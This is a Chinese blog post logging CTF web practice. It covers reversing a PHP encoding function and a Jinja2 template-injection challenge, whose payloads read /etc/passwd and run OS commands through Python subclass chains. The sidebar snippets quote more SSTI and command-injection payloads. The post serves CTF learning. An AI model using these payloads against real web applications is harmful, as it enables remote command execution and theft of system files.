【CTF】-Web练习日志8.5

已于 2022-08-05 21:59:51 修改
阅读量202 收藏
点赞数
文章标签: 前端 servlet
于 2022-08-05 21:59:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pyhsaihz/article/details/126185024
版权

题目一:web2

打开场景

<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";

function encode($str){
    $_o=strrev($str);  //反转字符串
    // echo $_o;
        
    for($_0=0;$_0<strlen($_o);$_0++){
       
        $_c=substr($_o,$_0,1); //取出每个字符
        $__=ord($_c)+1;   //给它们ascii+1
        $_c=chr($__);   //再转为字符
        $_=$_.$_c;      //组成新的字符串
    } 
    return str_rot13(strrev(base64_encode($_)));  //把新的字符串先base64编码>反转>rot13编码
}

highlight_file(__FILE__);
/*
   逆向加密算法,解密$miwen就是flag
*/
?>

倒着来一遍,比较懒直接在源代码上改

<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";

function encode($str){
    $_o=base64_decode(strrev(str_rot13($str))); // rot13解码>反转>base64解码
    // echo $_o;
        
    for($_0=0;$_0<strlen($_o);$_0++){
       
        $_c=substr($_o,$_0,1); //取出每个字符
        $__=ord($_c)-1;    //之前是+1现在-1
        $_c=chr($__);
        $_=$_.$_c;   
    } 
    return strrev($_);   //在反转
}

echo encode($miwen)
?>

 运行得到 flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

题目二:Web_python_template_injection

 看题目python_template_injection应该就是模板注入

推荐学习XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injection(SSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎)_大灬白的博客-CSDN博客python模板注入(多种方法,CTF可直接使用)_cosmos_web的博客-CSDN博客_python模板注入 

寻找可用引用{{''.__class__.__mro__[2].__subclasses__()}}

在第40个位置找到type file 

{{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }}

第71个位置找到 class ‘site._Printer’类(可以进行命令执行)

命令执行
//Windows操作系统
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
//Linux操作系统
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].system('ls')}}

先试了system('ls')发现没反应是windows系统,发现两个文件利用

 {{ [].__class__.__base__.__subclasses__()[40]('fl4g').read() }}读取

得到flag ctf{f22b6844-5169-4054-b2a0-d95b9361cb57} 

题目三:Web_php_unserialize 

 没看懂

攻防世界之Web_php_unserialize(超详细WP)_金 帛的博客-CSDN博客_攻防世界unserialize

攻防世界之Web_php_unserialize(web进阶)_0。0;的博客-CSDN博客 

考点就是PHP反序列化 

 

pyhsaihz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF 一些漏洞模式
qq_41996851的博客
05-10 833
SSTI模板注入 SSTI初探 SSTI 常用payload; {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
CTF---Web---文件包含---07---包含日志
qq_22160557的博客
07-28 1856
文章目录前言一、题目描述二、解题步骤1、判断系统2、访问日志3、linux特殊文件系统(/proc)三、总结 前言 题目分类: CTFWeb—文件包含—07—包含日志 一、题目描述 题目: 文件包含 链接:http://172.16.15.206/stage/6/index.php?file=says.php 提示:成功包含apache访问日志即可拿到key值 二、解题步骤 1、判断系统 首先,考生需要弄清楚这是一个windows系统还是一个linux系统,如果考生尝试包含win.ini则会提示失败,
2024年网安最全CTF-【NSCTF 2015】WEB11 条件竞争_nsctf 2015 web(1)
最新发布
2401_84264491的博客
05-03 804
条件竞争是指多进程/多线程情况下对于共享资源没有加锁,导致的问题。
ctfshow web3 web4--服务器日志文件包含
Dream'
10-18 3796
问题描述 打开题目发现只有一句php语句,看到include,考虑文件包含漏洞 问题解决 在网上逛了一圈,发现大佬们都是用php伪协议来做这道题,我考虑可不可以使用服务器日志来进行文件包含。先来看一下网站是什么服务器。 在网上查到nginx服务器日志目录为/var/log/nginx/access.log,查看一下 发现可以包含,我们想到可以在日志中插入php一句话木马,然后使用蚁剑或者菜刀连接 使用burp抓包,修改referer 写入一句话木马,使用a...
CTFshow刷题日记-WEB-黑盒测试(web380-395)文件包含、日志包含getshell、SQL注入
Love&Share
10-07 3008
web380-扫目录文件包含 扫目录,存在page.php 访问发现报错,$id参数,可能存在文件包含 /page.php?id=flag web381-读源码找后台地址 page.php已经无法文件包含 看源码有一个可疑的路径 访问这个目录,最后注意一定要带上/ web382-383弱口令加万能密码 上题的/alsckdfy/目录访问之后是个登录界面 burp抓包爆破就行了,p字段,这些都可以拿到flag web384-爆破密码 提示:密码前2位是小写字母,后三位是数字 这肯定是后台密码了,
CTF】-Web练习日志8.11
pyhsaihz的博客
08-12 332
ctf练习
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF-web学习大纲
01-30
CTF-web学习大纲
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
Linux pip3 rce复现
weixin_50618290的博客
10-26 1272
Linux pip rce
python绕过付费_禁用import的情况下绕过python沙箱
weixin_39795292的博客
12-06 512
本文总结一些python沙盒在禁用了import,__import__ ,无法导入模块的情况下沙盒绕过的一些方法, 国赛上出了一道python沙盒的题,做了一天没做出来, 让我知道我对python一无所知, 于是总结了一篇文章,大佬勿喷.basic在Python里,这段[].__class__.__mro__[-1].__subclasses__()魔术代码,不用import任何模块,但可调用任意...
[CTF技巧]命令注入绕过总结
3tefanie丶zhou的博客
07-08 3414
命令分隔符 cat /etc/passwd;ls 分号 ; cmd1;cmd2(多条语句顺序执行) cat /etc/passwd && ls and && cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2 cat etc || ls or || cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2 管道符 | | 管道符 管道符”|“
BUUCTF SSTI模板注入小结(持续更新)
CN天狼
05-02 1264
BUUCTF部分SSTI模板注入小结 [护网杯 2018]easy_tornado [BJDCTF2020]The mystery of ip [BJDCTF2020]Cookie is so stable [CISCN2019 华东南赛区]Web11 [WesternCTF2018]shrine [GYCTF2020]FlaskApp [CSCCTF 2019 Qual]FlaskLight
CTFweb题库笔记(难度4)
cocoaiu的博客
08-13 5377
CTFweb题库笔记(41-50)
CTFWEB 代码执行&命令执行&CTFSHOW wp
m0_48736242的博客
10-02 2038
CTFWEB 代码执行&命令执行&CTFSHOW wp
NSCTF-部分题目wp
1stPeak's Blog
09-08 2093
文章目录Web-xffWeb-sqlWeb-XXECRYPTO-神算子CRYPTO-Catch_the_pointCRYPTO-dataMISC-docxMISC-BBQMISC-xxencode+uuencode Web-xff 方法一: 方法二: Web-sql 解题思路: (1)dirsearch扫出备份文件 (2)分析文件 分析index.php文件: <?php require("conf/config.php"); if (isset($_REQUEST['id']))
宁波市第三届网络安全大赛(NSCTF)WP
zhwho的博客
07-12 2396
** 写在开头 从简书回来了,入坑简书半年,由于个人原因,简书账号注销了,以后就在CSDN上写啦 hhhh ** 前段时间和室友一起参加了这次NSCTF,做的题比较杂,WEB、MISC、密码,想着这几天会开环境给复现,现在看好像不给开环境,有的题保存下来了,这里先写写思路,有些截图没保存,以后有机会一定补上。 WEB 签到——本地访问 打开环境,印象里是有一句话: 只有本地管理员才能访问,你想越权访问吗? 这就很明显了,当然想越权访问,不然怎么拿flag?而拿flag的条件很明显有两个——1.本地 2.管理
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),并提交给平台进行验证。 "此地无银三百"是ctf-qsnctf平台上的一道题目,它的名称可能是一个提示,暗示着解题的思路。具体的解题方法和答案我无法透露,因为这会破坏比赛的公平性和乐趣。如果你对这道题目感兴趣,我建议你在ctf-qsnctf平台上注册账号并参与比赛,通过自己的努力和思考来解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值